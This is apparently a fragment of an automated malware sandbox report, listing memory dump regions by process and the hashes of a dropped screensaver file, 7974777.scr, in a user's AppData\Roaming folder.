SHA512 db9228e8b2cfd49f4371c4aac1bac9787982399c575252910a5aa54e7246907ec4d0c85976f4e258e573ab6703d4c67b04bca59937f4e8e60504ddfa0994014b

memory/4172-415-0x0000000004CC0000-0x00000000051BE000-memory.dmp

memory/2644-427-0x0000000005760000-0x0000000005D66000-memory.dmp

memory/4792-428-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\7974777.scr

MD5 87ab55c2316e05567d9c45f77028da15
SHA1 8a159e4b3afda505bb1b4665b2be856d5804cfea
SHA256 fc9887d5ba7add7ea1b487e58f0a5495adfe833cf1e75067edec2a1dce49df20
SHA512 3fca98782e50c9a77ac93c8d934c36cd77612381884cc0fd913e255016998271b993819b841ba0bfc19f89cf0302d895d884158e8d776c8f85b61b03a0f0ad16

C:\Users\Admin\AppData\Roaming\7974777.scr

MD5 87ab55c2316e05567d9c45f77028da15
SHA1 8a159e4b3afda505bb1b4665b2be856d5804cfea
SHA256 fc9887d5ba7add7ea1b487e58f0a5495adfe833cf1e75067edec2a1dce49df20
SHA512 3fca98782e50c9a77ac93c8d934c36cd77612381884cc0fd913e255016998271b993819b841ba0bfc19f89cf0302d895d884158e8d776c8f85b61b03a0f0ad16

memory/4976-440-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4976-442-0x0000000004C90000-0x0000000004C91000-memory.dmp

memory/4976-438-0x0000000000580000-0x00000000006CA000-memory.dmp

memory/4976-446-0x0000000004C92000-0x0000000004C93000-memory.dmp

memory/4976-448-0x0000000004C93000-0x0000000004C94000-memory.dmp

memory/4976-443-0x0000000004C94000-0x0000000004C96000-memory.dmp

memory/4792-452-0x0000000004970000-0x0000000004971000-memory.dmp

memory/1488-466-0x0000000001110000-0x0000000001130000-memory.dmp